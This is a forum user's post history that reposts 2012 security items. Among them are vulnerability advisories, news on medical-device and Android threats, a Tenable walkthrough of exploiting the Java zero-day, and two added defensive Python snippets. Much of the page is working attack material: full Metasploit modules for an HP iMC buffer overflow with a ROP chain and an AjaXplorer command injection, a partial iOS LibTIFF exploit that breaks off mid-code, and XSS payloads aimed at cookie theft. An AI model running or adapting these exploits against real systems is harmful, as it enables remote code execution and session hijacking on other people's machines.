hathat

Everything posted by hathat

  1. Microsoft Office Excel 2010 Crash PoC

    Title   : Microsoft Office Excel 2010 memory corruption
    Version : Microsoft Office professional Plus 2010
    Date    : 2012-10-27
    Vendor  : http://office.microsoft.com
    Impact  : Med/High
    Contact : coolkaveh [at] rocketmail.com
    Twitter : @coolkaveh
    tested  : XP SP3 ENG
    ###############################################################################
    Bug :
    ----
    memory corruption during the handling of the xls files
    a context-dependent attacker can execute arbitrary code.
    ----
    ################################################################################
    (b4c.1350): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000584 ebx=00135070 ecx=00001000 edx=0000105f esi=06a80800 edi=00000040
    eip=301ce0d0 esp=001302f0 ebp=00131d6c iopl=0         nv up ei pl zr na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for Excel.exe -
    Excel!Ordinal40+0x1ce0d0:
    301ce0d0 668b5008        mov     dx,word ptr [eax+8]   ds:0023:0000058c=????
    ################################################################################
    Proof of concept included.
    Zippyshare.com - POC.rar
    http://www.exploit-db.com/sploits/22330.rar

    Source: Microsoft Office Excel 2010 Crash PoC
  2. Endpoint Protector v4.0.4.2 Multiple Persistent XSS

    Advisory Name: Multiple Persistent Cross-Site Scripting (XSS) in Endpoint Protector
    Internal Cybsec Advisory Id: 2012-1029-Multiple Persistent XSS in Endpoint Protector
    Vulnerability Class: Permanent Cross-Site Scripting (XSS)
    Release Date: 10/29/2012
    Affected Applications: Endpoint Protector v4.0.4.2; other versions may also be affected.
    Affected Platforms: Any running Endpoint Protector v4.0.4.2
    Local / Remote: Remote
    Severity: High - CVSS: 5.8 (AV:N/AC:M/Au:NR/C:N/I:P/A:P)
    Researcher: Juan Manuel Garcia
    Vendor Status: Acknowledged / Unpatched
    Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf

    Vulnerability Description:

    Multiple Persistent Cross-Site Scripting vulnerabilities were found in Endpoint Protector v4.0.4.2 [Virtual Appliance], because the application fails to sanitize the response before it is returned to the user. This can be exploited to execute arbitrary script and HTML code in a user's browser session. This may allow the attacker to steal the user's cookie and to launch further attacks.

    The parameters "client_device[name]" and "client_device[description]" in /index.php/clientdevice/create are not properly sanitized.
    The parameters "client_machine[name]", "client_machine[domain]", "client_machine[workgroup]" and "client_machine[location]" in /index.php/clientmachine/create are not properly sanitized.
    The parameter "group[name]" in /index.php/mgroup/create is not properly sanitized.
    Other parameters might also be affected.

    Proof of Concept:

    * The parameter "client_device[name]" in the POST request has been set to: <script>alert(document.cookie)</script>
    * The parameter "client_device[description]" in the POST request has been set to: <script>alert(1)</script>

    POST /index.php/clientdevice/create HTTP/1.1
    Host: xxx.xxx.xxx.xxx
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:11.0) Gecko/20100101 Firefox/11.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Referer: https://xxx.xxx.xxx.xxx/index.php/
    Cookie: place=clientdevice; mark=clientdevice; ratool=d4d3242c4444254d035b7f797738837e
    Content-Type: multipart/form-data; boundary=---------------------------17723440641777718806882422624
    Content-Length: 1131

    -----------------------------17723440641777718806882422624
    Content-Disposition: form-data; name="id"

    -----------------------------17723440641777718806882422624
    Content-Disposition: form-data; name="client_device[department_id]"

    1
    -----------------------------17723440641777718806882422624
    Content-Disposition: form-data; name="client_device[device_type_id]"

    1
    -----------------------------17723440641777718806882422624
    Content-Disposition: form-data; name="client_device[name]"

    <script>alert(document.cookie)</script>
    -----------------------------17723440641777718806882422624
    Content-Disposition: form-data; name="client_device[description]"

    <script>alert(1)</script>
    -----------------------------17723440641777718806882422624
    Content-Disposition: form-data; name="client_device[vid]"

    -----------------------------17723440641777718806882422624
    Content-Disposition: form-data; name="client_device[pid]"

    -----------------------------17723440641777718806882422624
    Content-Disposition: form-data; name="client_device[serialno]"

    -----------------------------17723440641777718806882422624--

    Impact:

    An affected user may unintentionally execute scripts or actions written by an attacker. In addition, an attacker may obtain authorization cookies that would allow him to gain unauthorized access to the application. In this particular case, any user with permission to access the administration console could gain "super admin" privileges by stealing the session cookie of another user with this permission.

    Vendor Response:

    2012/03/27 - Vulnerability was identified
    2012/03/29 - Cybsec sent detailed information on the issue and a Proof of Concept to the vendor
    2012/04/04 - Vendor confirmed vulnerability (Request ID - 10006599) and stated "The problems encountered do not represent a significant threat for customers using it because it is usually done with no Internet connection"
    2012/04/05 - Vendor stated "we planned an official release of the new patch to include all the fixes for mentioned vulnerabilities for the date of 18 of September 2012"
    2012/09/25 - Cybsec asked the vendor if the update had been released on the planned date
    2012/09/26 - Vendor stated that he would check the status of the report [Ticket#2012092510000057]
    2012/10/03 - Vendor gave us a new deadline: up to 3-4 months.
    2012/10/24 - Vendor asked if we had published the security advisory
    2012/10/24 - Cybsec stated that the security advisory was going to be published on October 29
    2012/10/29 - Vulnerability was released

    Contact Information:

    For more information regarding the vulnerability feel free to contact the researcher at jmgarcia <at> cybsec <dot> com

    About CYBSEC S.A. Security Systems

    Since 1996, CYBSEC has been engaged exclusively in rendering professional services specialized in Information Security. Its area of service covers Latin America and Spain, and over 250 customers are proof of its professional record. To keep its objectivity, CYBSEC S.A. does not represent, sell, or associate with other software and/or hardware provider companies.

    Our services are strictly focused on Information Security, protecting our clients from emerging security threats and keeping their IT deployments available, safe, and reliable. Beyond professional services, CYBSEC is continuously researching new defense and attack techniques and contributing to the security community with high quality information exchange.

    For more information, please visit www.cybsec.com

    (c) 2010 - CYBSEC S.A. Security Systems

    Source: Endpoint Protector v4.0.4.2 Multiple Persistent XSS
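The defence the advisory points at is encoding stored values at the moment they are rendered, rather than trusting whatever was posted to /index.php/clientdevice/create. The Python below is an added example, not Endpoint Protector's code nor CYBSEC's; the device records, the field names and the table layout are constructed to mirror the PoC's parameters, and the escaping is done with the standard library's html.escape so the same helper covers both text nodes and double-quoted attribute values.

```python
import html
import re

# Constructed sample records modelled on the advisory's PoC inputs (not data
# from a real Endpoint Protector appliance). Both fields are attacker-controlled
# once stored, so every render of them must encode.
SAMPLE_DEVICES = [
    {"id": 1, "name": "<script>alert(document.cookie)</script>",
     "description": "<script>alert(1)</script>"},
    {"id": 2, "name": 'Badge reader "north"', "description": "Lobby & reception"},
]


def render_device_row(device):
    """Render one device as a table row, escaping every stored field at output
    time. quote=True also encodes " and ', which is what makes the value safe
    inside the data-name="..." attribute as well as inside the cells."""
    name = html.escape(str(device["name"]), quote=True)
    desc = html.escape(str(device["description"]), quote=True)
    return (f'<tr data-name="{name}">'
            f'<td>{device["id"]}</td><td>{name}</td><td>{desc}</td></tr>')


def render_device_table(devices):
    """Assemble the listing page fragment from individually escaped rows."""
    rows = "".join(render_device_row(d) for d in devices)
    return f"<table>{rows}</table>"


# Tags that would execute or load active content if they survived unescaped.
_ACTIVE_TAG_RE = re.compile(r"<\s*/?\s*(script|img|svg|iframe|object)\b", re.I)


def contains_active_markup(rendered_html):
    """Regression check for the template: strip the template's own structural
    tags and report whether any raw active tag is left. After escaping, the
    only '<' characters in the output belong to <table>, <tr> and <td>."""
    body = re.sub(r"</?(table|tr|td)\b[^>]*>", "", rendered_html)
    return bool(_ACTIVE_TAG_RE.search(body))


if __name__ == "__main__":
    page = render_device_table(SAMPLE_DEVICES)
    print(page)
    print("active markup present:", contains_active_markup(page))
```

The point of the check function is that it can sit in a unit test: feed the stored PoC strings through the real template and assert that no raw `<script` reaches the response, which is exactly the condition the advisory says the appliance fails.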
  3. HP Intelligent Management Center UAM Buffer Overflow

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # web site for more information on licensing and terms of use.
    #   http://metasploit.com/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = NormalRanking

      include Msf::Exploit::Remote::Udp

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'HP Intelligent Management Center UAM Buffer Overflow',
          'Description'    => %q{
              This module exploits a remote buffer overflow in HP Intelligent Management
            Center UAM. The vulnerability exists in the uam.exe component, when using sprint
            in a insecure way for logging purposes. The vulnerability can be triggered by
            sending a malformed packet to the 1811/UDP port. The module has been successfully
            tested on HP iMC 5.0 E0101 and UAM 5.0 E0102 over Windows Server 2003 SP2 (DEP
            bypass).
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
            [
              'e6af8de8b1d4b2b6d5ba2610cbf9cd38', # Vulnerability discovery
              'sinn3r',                           # Metasploit module
              'juan vazquez'                      # Metasploit module
            ],
          'References'     =>
            [
              ['OSVDB', '85060'],
              ['BID', '55271'],
              ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-171']
            ],
          'Payload'        =>
            {
              'BadChars'       => "\x00\x0d\x0a",
              'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment # add esp, -3500
              'Space'          => 3925,
              'DisableNops'    => true
            },
          'Platform'       => ['win'],
          'Targets'        =>
            [
              [ 'HP iMC 5.0 E0101 / UAM 5.0 E0102 on Windows 2003 SP2',
                {
                  'Offset' => 4035,
                }
              ]
            ],
          'Privileged'     => true,
          'DisclosureDate' => 'Aug 29 2012',
          'DefaultTarget'  => 0))

        register_options([Opt::RPORT(1811)], self.class)
      end

      def junk(n=4)
        return rand_text_alpha(n).unpack("V")[0].to_i
      end

      def nop
        return make_nops(4).unpack("V")[0].to_i
      end

      def send_echo_reply(operator)
        packet = [0xF7103D21].pack("N") # command id
        packet << rand_text(18)
        packet << [0x102].pack("n")      # watchdog command type => echo reply
        packet << "AAAA"                 # ip (static to make offset until EIP static)
        packet << "AA"                   # port (static to make offset until EIP static)
        packet << operator               # Operator max length => 4066, in order to bypass packet length restriction: 4096 total

        connect_udp
        udp_sock.put(packet)
        disconnect_udp
      end

      def exploit
        # ROP chain generated with mona.py - See corelan.be
        rop_gadgets =
          [
            0x77bb2563, # POP EAX # RETN
            0x77ba1114, # <- *&VirtualProtect()
            0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
            junk,
            0x77bb0c86, # XCHG EAX,ESI # RETN
            0x77bc9801, # POP EBP # RETN
            0x77be2265, # ptr to 'push esp # ret'
            0x77bb2563, # POP EAX # RETN
            0x03C0990F,
            0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)
            0x77bb48d3, # POP EBX, RET
            0x77bf21e0, # .data
            0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
            0x77bbfc02, # POP ECX # RETN
            0x77bef001, # W pointer (lpOldProtect) (-> ecx)
            0x77bd8c04, # POP EDI # RETN
            0x77bd8c05, # ROP NOP (-> edi)
            0x77bb2563, # POP EAX # RETN
            0x03c0984f,
            0x77bdd441, # SUB EAX, 03c0940f
            0x77bb8285, # XCHG EAX,EDX # RETN
            0x77bb2563, # POP EAX # RETN
            nop,
            0x77be6591, # PUSHAD # ADD AL,0EF # RETN
          ].pack("V*")

        bof = rand_text(14)
        bof << rop_gadgets
        bof << payload.encoded
        bof << "C" * (target['Offset'] - 14 - rop_gadgets.length - payload.encoded.length)
        bof << [0x77bb0c86].pack("V") # EIP => XCHG EAX,ESI # RETN # from msvcrt.dll
        bof << [0x77bcc397].pack("V") # ADD EAX,2C # POP EBP # RETN # from msvcrt.dll
        bof << [junk].pack("V")       # EBP
        bof << [0x77bcba5e].pack("V") # XCHG EAX,ESP # RETN # from msvcrt.dll

        print_status("Trying target #{target.name}...")
        send_echo_reply(rand_text(20)) # something like... get up! ?
        send_echo_reply(bof)           # exploit
      end

    end

    Source: HP Intelligent Management Center UAM Buffer Overflow
  4. Researcher Demonstrates Lethal Medical Device Exploit

    Noted security researcher Barnaby Jack has dealt another blow to medical device insecurity with an exploit that shows how attackers could hack communications terminals for pacemakers and implanted cardioverter-defibrillators (ICDs) to administer potentially lethal jolts.

    In a shocking presentation at the BreakPoint Security Conference in Melbourne this week, Jack demonstrated how a malicious actor could reverse-engineer elements of a device's wireless transmitter terminal and rewrite firmware from as close as thirty feet away using only a laptop, then deliver high voltage blasts which could result in fatality for the intended target.

    "With a max voltage of 830 volts, it's not hard to see why this is a fairly deadly feature. Not only could you induce cardiac arrest, but you could continually recharge the device and deliver shocks on loop," Jack was quoted as saying of the exploit.

    Jack also discovered that, due to a lack of authentication protocols in the systems that control wireless communications with the devices, self-propagating malware could be designed to cause a chain of infections between compromised devices within close proximity of one another.

    "The worst case scenario that I can think of, which is 100 percent possible with these devices, would be to load a compromised firmware update onto a programmer and ... the compromised programmer would then infect the next pacemaker or ICD and then each would subsequently infect all others in range," Jack explained.

    At last year's Hacker Halted conference in Miami, Jack similarly conducted the exploit of an implanted insulin pump. The demonstration was a follow-up to Jay Radcliffe's August hack of an insulin pump at the Black Hat Conference in Las Vegas, but with a twist: where Radcliffe had the advantage of knowing the targeted unit's model type and serial numbers to conduct the attack, Jack was able to use an off-the-shelf antenna and receiver assembly to remotely scan for the information on the targeted device. After using the antenna to locate and isolate the target, Jack proceeded to instruct the unit to deliver a potentially lethal dose of insulin, as well as showing how he could switch the device off entirely.

    For both exploits, the researcher has declined to publicly provide details on the targeted devices, such as the manufacturer or model types, for security reasons. The point of the exploits, Jack says, is to encourage medical device producers to take the necessary precautions in design and implementation to protect users from the possibility of harm at the hands of miscreants.

    Source: http://www.securitybistro.com/blog/?p=2794
  5. Monitoring the Life of a Java Zero-Day Exploit with Tenable USM

    Not too long ago, CVE-2012-4681 (US-CERT Alert TA12-240A and Vulnerability Note VU#636312) was issued for a flaw discovered in Oracle Java (JDK and JRE 7 U6 and before), as well as version 6 U34 and before. This is a client-side vulnerability, which requires a user to initiate activity to be exploited. I will avoid dissecting the flaw in detail, as this information is widely available on the Web (a particularly good write-up is here). Keep in mind that Java is platform independent, and so is this exploit. The example here uses Internet Explorer on Windows 7 (with Java SE 7u3). However, Linux and OS X users shouldn't feel excluded on this one!

    With Tenable's SecurityCenter (SC), combined with PVS and LCE, we can track this exploit from start to finish. This solution is known as Tenable USM, or Unified Security Monitoring. The system design used here involves an attacker using Metasploit on Linux (augusta - 192.168.2.7), the client running Windows 7 (brunswick - 192.168.7.9), PVS monitoring both subnets with real-time syslog events enabled and sent to LCE, and SecurityCenter tying it all together for analysis.

    First, let's start Metasploit and prepare the exploit reverse TCP handler with payload:

    Now, before we even start exploit activity, it is important to note that PVS has already detected through passive analysis that the Windows 7 workstation is using a vulnerable version of Java. Here we see the output in SC showing what was sniffed on the wire:

    The next step is to go to our Windows 7 workstation and launch a Web browser. Here we will point the URL to the exploit server we just started in Metasploit (http://192.168.2.7:8080):

    The user only sees a blank page, but something far more interesting is going on in the background. This is what the attacker sees:

    The session has been completed, and now we can take over the system using Meterpreter. Let's start the shell and poke around.

    Since this exploit is now successfully launched, we can even download files from the victim:

    None of this is going unseen, however. A quick view of the LCE traffic gathered for the Windows 7 workstation in SecurityCenter shows a suspicious spike for many different event types during this process:

    Drilling down further, we can take advantage of Tenable USM's ability to see all. Since we have PVS sending real-time data to LCE, we are immediately notified of exactly what the victim did to get into this situation; specifically, the "PVS-Web_Request" normalized event. Here is a snippet of the raw log data on this particular session:

    As you can see, the URI request for "/Exploit.jar" is something to cause alarm. If we switch over to the 'Vulnerabilities' tab in SecurityCenter, we can also see that PVS plugin #7 for "Internal encrypted sessions" shows some very helpful information:

    Setting up alerts and dashboards that keep us aware of any activity like this can help immediately discover that something bad has happened. There are many more ways our software can aid with the discovery and analysis of security events and vulnerabilities. Hopefully, this example gives you a better idea of just what you can do with Tenable products to keep your organization safe and aware.

    Source: Tenable Network Security: Monitoring the Life of a Java Zero-Day Exploit with Tenable USM

    Maybe this isn't the most appropriate section, but it seems useful to me.
  6. Android adware, Zitmo botnets and Romanian hackers, oh my!

    09 October 2012

    We're not in Kansas anymore: The third quarter of 2012 saw a marked increase in Android adware, while new evidence surfaced suggesting that the Zeus-in-the-Mobile (Zitmo) banking trojan is evolving into a botnet. And, Romanian hackers are continuing to perform large-scale scanning for web vulnerabilities, according to the quarterly threat assessment from Fortinet.

    Fortinet's breakdown of the hacker Yellow Brick Road, as it were, begins with adware for Android, which is on the rise; it places unwanted advertisements in a mobile device's status bar, tracks users via their International Mobile Equipment Identity (IMEI) numbers and drops icons on the device's desktop. To be sure, the percentages are still small overall (the two primary adware variants, Android/NewyearL and Android/Plankton, were detected by close to 1% of all FortiGuard monitoring systems in the APAC and EMEA regions and 4% in the Americas), but with a volume of activity comparable to infamous spam-generator Netsky.PP, it's enough to take notice.

    "The surge in Android adware can most likely be attributed to users installing on their mobile devices legitimate applications that contain the embedded adware code," said Guillaume Lovet, senior manager of Fortinet's FortiGuard Labs Threat Response Team. "It suggests that someone or some group is making money, most likely from rogue advertising affiliate programs."

    Consumers can identify these types of applications because they require too many unnecessary permissions for a normal application, "indicating it has a hidden agenda," said Lovet. For best practices, FortiGuard Labs recommends paying close attention to the rights asked for by the application at the point of installation. Red flags include asking permission to access parts of the device that are irrelevant to the application, like the device's browser history and bookmarks, contact data and phone logs, identity information and system log files. And to be completely on the safe side, users should only download mobile applications that have been highly rated and reviewed.

    Meanwhile, FortiGuard researchers have discovered that the Zitmo banking bug has evolved into a more complex, botnet-like threat, with new versions recently released for Android and Blackberry. Zitmo is the notorious mobile component of the Zeus banking Trojan, discovered in June 2012 after circulating on the Symbian platform for a couple of years. The new versions for Android and Blackberry have now added botnet-like features, such as enabling cybercriminals to control the Trojan via SMS commands.

    Zitmo is used by cybercriminals in tandem with the traditional Zeus keylogging malware on PCs to steal the victim's banking credentials and ultimately their money. Zitmo is used to intercept SMS messages containing the two-factor authentication credentials that banks use to validate the identity of the account holder when logging in. Now, there is evidence that a botnet strategy is the next wave of evolution for the virus.

    "The new version of Zitmo may already be in the wild in Europe and Asia," said Lovet. "While we're detecting only a few instances of the malware in those regions, it's leading us to believe the code is currently being tested by its authors or deployed for very specific, targeted attacks."

    On a related note, Fortinet researchers also recently found a new Android malware in the wild in France, which poses as a Flash Player installer and steals incoming SMS messages by forwarding them to a remote server. Fortinet has dubbed it Android/Fakelash.A!tr.spy.

    "Contrary to many Android malware which are downloaded from underground or legitimate marketplaces, this one is propagating via a link in an SMS," said Fortinet researcher Axelle Apvrille, in the company blog. "For example, the victim below complains he received an SMS from 10052 saying, 'For proper function of your device, please download the new ANDROID Flash update at this link: http://tinyurl.com/xxxxx'."

    As more banks and online merchants roll out two-factor authentication (usually through the use of an SMS code to bring the second authentication factor and confirm a transaction), Android and Blackberry users should be mindful anytime their financial institution asks them to install software onto their computing device, "as this is something banks rarely if ever request from their customers," Lovet noted. For complete security, FortiGuard Labs recommends conducting online banking from the original operating system CD. If that is not an option, users should at the very least install an anti-virus client on their phone and desktop PCs and make sure they are updated with the latest patches.

    Meanwhile, Fortinet also has detected large-scale vulnerability scans emanating from Eastern Europe. These scans were performed through a tool developed by Romanian hackers to seek web servers running vulnerable versions of the MySQL administration software (phpMyAdmin) in order to take control of those servers. The tool, called ZmEu, contains code strings in the payload that refer to AntiSec, the global hacking movement initiated by Anonymous and Lulzsec last year that targets banks and government departments. The scans are being performed around the world, and in September, almost 25% of FortiGuard monitoring systems were detecting at least one such scan per day.

    "The goal behind an attack on this vulnerability is open to speculation," added Lovet. "But if these hackers are indeed related to AntiSec, possible scenarios include exfiltrating sensitive data, using the compromised servers as a direct denial of service (DDoS) launch base or defacing the Websites they've infiltrated."

    To secure Web servers against this threat, Fortinet recommends updating to the latest version of phpMyAdmin.

    Source: Infosecurity - Android adware, Zitmo botnets and Romanian hackers, oh my!
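Both the Tenable post (entry 5) and the Fortinet report (entry 6) come down to indicators that show up in ordinary web-server access logs: a browser being steered to an attacker page and then fetching "/Exploit.jar", and one source hammering phpMyAdmin-style paths. The Python below is an added example that belongs to neither post. The log lines are constructed (the 192.168.2.7 and 192.168.7.9 addresses mirror the lab hosts in the Tenable write-up; the scanner addresses are from documentation ranges), the Apache/NCSA combined log format is assumed, and so is the assumption that the ZmEu scanner announces itself with a User-Agent of "ZmEu", which the page does not state.

```python
import re
from collections import Counter

# Apache/NCSA "combined" access-log format (assumed; adjust for your server).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines, not captured from a real system.
SAMPLE_LOG = """\
192.168.7.9 - - [15/Oct/2012:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1) Java/1.7.0_03"
192.168.7.9 - - [15/Oct/2012:10:01:03 +0000] "GET /Exploit.jar HTTP/1.1" 200 4096 "http://192.168.2.7:8080/" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_03"
198.51.100.23 - - [15/Oct/2012:10:05:00 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 210 "-" "ZmEu"
198.51.100.23 - - [15/Oct/2012:10:05:01 +0000] "GET /pma/ HTTP/1.1" 404 210 "-" "ZmEu"
198.51.100.23 - - [15/Oct/2012:10:05:01 +0000] "GET /myadmin/ HTTP/1.1" 404 210 "-" "ZmEu"
203.0.113.8 - - [15/Oct/2012:10:07:30 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the named fields of one combined-format line, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the indicator names that apply to one parsed request."""
    hits = []
    path = entry["path"].lower()
    ua = entry["ua"]
    # Entry 5: the Java plug-in fetching a .jar from a page the browser was just
    # sent to is the drive-by pattern; Tenable's post keys on "/Exploit.jar".
    if path.endswith(".jar") and "java/" in ua.lower():
        hits.append("java-applet-download")
    # Entry 6: ZmEu sweeps many phpMyAdmin-style paths in quick succession.
    # The "ZmEu" User-Agent value is an assumption, not taken from the page.
    if ua == "ZmEu" or re.search(r"(phpmyadmin|pma|myadmin)", path):
        hits.append("phpmyadmin-probe")
    return hits


def triage(log_text):
    """Parse every line, tag indicators, and count probes per source address so
    a single scanner sweeping many paths surfaces as one finding to act on."""
    findings = []
    probes_per_ip = Counter()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue  # malformed or non-combined line; skip rather than crash
        tags = classify(entry)
        if "phpmyadmin-probe" in tags:
            probes_per_ip[entry["ip"]] += 1
        for tag in tags:
            findings.append((tag, entry["ip"], entry["path"]))
    return findings, probes_per_ip


if __name__ == "__main__":
    found, probes = triage(SAMPLE_LOG)
    for tag, ip, path in found:
        print(f"{tag:22} {ip:15} {path}")
    for ip, n in probes.most_common():
        print(f"{ip} probed {n} admin path(s)")
```

The applet rule deliberately requires both the .jar path and a Java User-Agent: a human browsing to a .jar link downloads it with the browser's own agent string, whereas the plug-in fetch is what the PVS "PVS-Web_Request" event in the Tenable post captured. The per-IP counter is what turns three 404s into a scan finding rather than three unrelated misses.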
  7. AjaXplorer checkInstall.php Remote Command Execution

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # web site for more information on licensing and terms of use.
    #   http://metasploit.com/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'AjaXplorer checkInstall.php Remote Command Execution',
          'Description'    => %q{
              This module exploits an arbitrary command execution vulnerability in the
            AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to 2.6
            are vulnerable.
          },
          'Author'         =>
            [
              'Julien Cayssol',  #Credited according to SecurityFocus
              'David Maciejak', #Metasploit module
              'sinn3r'          #Final touch on the Metasploit module
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              [ 'OSVDB', '63552' ],
              [ 'BID', '39334' ]
            ],
          'Privileged'     => false,
          'Payload'        =>
            {
              'DisableNops' => true,
              'Space'       => 512,
              'Compat'      =>
                {
                  'ConnectionType' => 'find',
                  'PayloadType'    => 'cmd',
                  'RequiredCmd'    => 'generic perl ruby python bash telnet'
                }
            },
          'Platform'       => ['unix', 'bsd', 'linux', 'osx', 'windows'],
          'Arch'           => ARCH_CMD,
          'Targets'        => [[ 'AjaXplorer 2.5.5 or older', { }]],
          'DisclosureDate' => 'Apr 4 2010',
          'DefaultTarget'  => 0))

        register_options(
          [
            OptString.new('TARGETURI', [true, 'The base path to AjaXplorer', '/AjaXplorer-2.5.5/'])
          ], self.class)
      end

      def check
        target_uri.path << '/' if target_uri.path[-1,1] != '/'
        clue = Rex::Text::rand_text_alpha(rand(5) + 5)

        res = send_request_cgi({
          'method'   => 'GET',
          'uri'      => "#{target_uri.path}plugins/access.ssh/checkInstall.php",
          'vars_get' => {
            'destServer' => "||echo #{clue}"
          }
        })

        # If the server doesn't return the default redirection, probably something is wrong
        if res and res.code == 200 and res.body =~ /#{clue}/
          return Exploit::CheckCode::Vulnerable
        end

        return Exploit::CheckCode::Safe
      end

      def exploit
        peer = "#{rhost}:#{rport}"
        target_uri.path << '/' if target_uri.path[-1,1] != '/'

        # Trigger the command execution bug
        res = send_request_cgi({
          'method'   => 'GET',
          'uri'      => "#{target_uri.path}plugins/access.ssh/checkInstall.php",
          'vars_get' => {
            'destServer' => "||#{payload.encoded}"
          }
        })

        if res
          print_status("#{peer} - The server returned: #{res.code} #{res.message}")
          m = res.body.scan(/Received output:\s\[([^\]]+)\]/).flatten[0] || ''
          if m.empty?
            print_error("#{peer} - This server may not be vulnerable")
          else
            print_status("#{peer} - Command output from the server:")
            print_line(m)
          end
        end
      end
    end

    =begin
    Repo:
    http://sourceforge.net/projects/ajaxplorer/files/ajaxplorer/2.6/
    =end

    Source: AjaXplorer checkInstall.php Remote Command Execution
  8. Apple iOS MobileSafari LibTIFF Buffer Overflow

    ##
    # $Id: safari_libtiff.rb 15950 2012-10-09 18:31:08Z rapid7 $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # web site for more information on licensing and terms of use.
    #   http://metasploit.com/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = GoodRanking

      #
      # This module acts as an HTTP server
      #
      include Msf::Exploit::Remote::HttpServer::HTML

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Apple iOS MobileSafari LibTIFF Buffer Overflow',
          'Description'    => %q{
              This module exploits a buffer overflow in the version of libtiff shipped
            with firmware versions 1.00, 1.01, 1.02, and 1.1.1 of the Apple iPhone.
            iPhones which have not had the BSD tools installed will need to use a
            special payload.
          },
          'License'        => MSF_LICENSE,
          'Author'         => ['hdm', 'kf'],
          'Version'        => '$Revision: 15950 $',
          'References'     =>
            [
              ['CVE', '2006-3459'],
              ['OSVDB', '27723'],
              ['BID', '19283']
            ],
          'Payload'        =>
            {
              'Space'    => 1800,
              'BadChars' => "",
              # Multi-threaded applications are not allowed to execve() on OS X
              # This stub injects a vfork/exit in front of the payload
              'Prepend'  =>
                [
                  0xe3a0c042, # vfork
                  0xef000080, # sc
                  0xe3500000, # cmp r0, #0
                  0x1a000001, # bne
                  0xe3a0c001, # exit(0)
                  0xef000080  # sc
                ].pack("V*")
            },
          'Arch'           => ARCH_ARMLE,
          'Targets'        =>
            [
              [ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',
                {
                  'Platform' => 'osx',
                  # Scratch space for our shellcode and stack
                  'Heap'     => 0x00802000,
                  # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib
                  'Magic'    => 0x300d562c,
                }
              ],
            ],
          'DefaultTarget'  => 0,
          'DisclosureDate' => 'Aug 01 2006'
        ))
      end

      def on_request_uri(cli, req)
        # Re-generate the payload
        return if ((p = regenerate_payload(cli)) == nil)

        # Grab reference to the target
        t = target

        print_status("Sending exploit")

        # Transmit the compressed response to the client
        send_response(cli, generate_tiff(p, t), { 'Content-Type' => 'image/tiff' })

        # Handle the payload
        handler(cli)
      end

      def generate_tiff(code, targ)
        #
        # This is a TIFF file, we have a huge range of evasion
        # capabilities, but for now, we don't use them.
        #  - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday
        #

        lolz = 2048

        tiff =
          "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+
          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
          "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+
          "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"+
          "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"+
          "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"+
          "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"+
          "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+
          "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+
          "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+
          [lolz].pack("V") +
          "\x84\x00\x00\x00\x00\x00\x00\x00"

        # Randomize the bajeezus out of our data
        hehe = rand_text(lolz)

        # Were going to candy mountain!
        hehe[120, 4] = [targ['Magic']].pack("V")

        # >> add r0, r4, #0x30
        hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack("V")

        # Candy mountain, Charlie!
        # >> mov r1, sp

        # It will be an adventure!
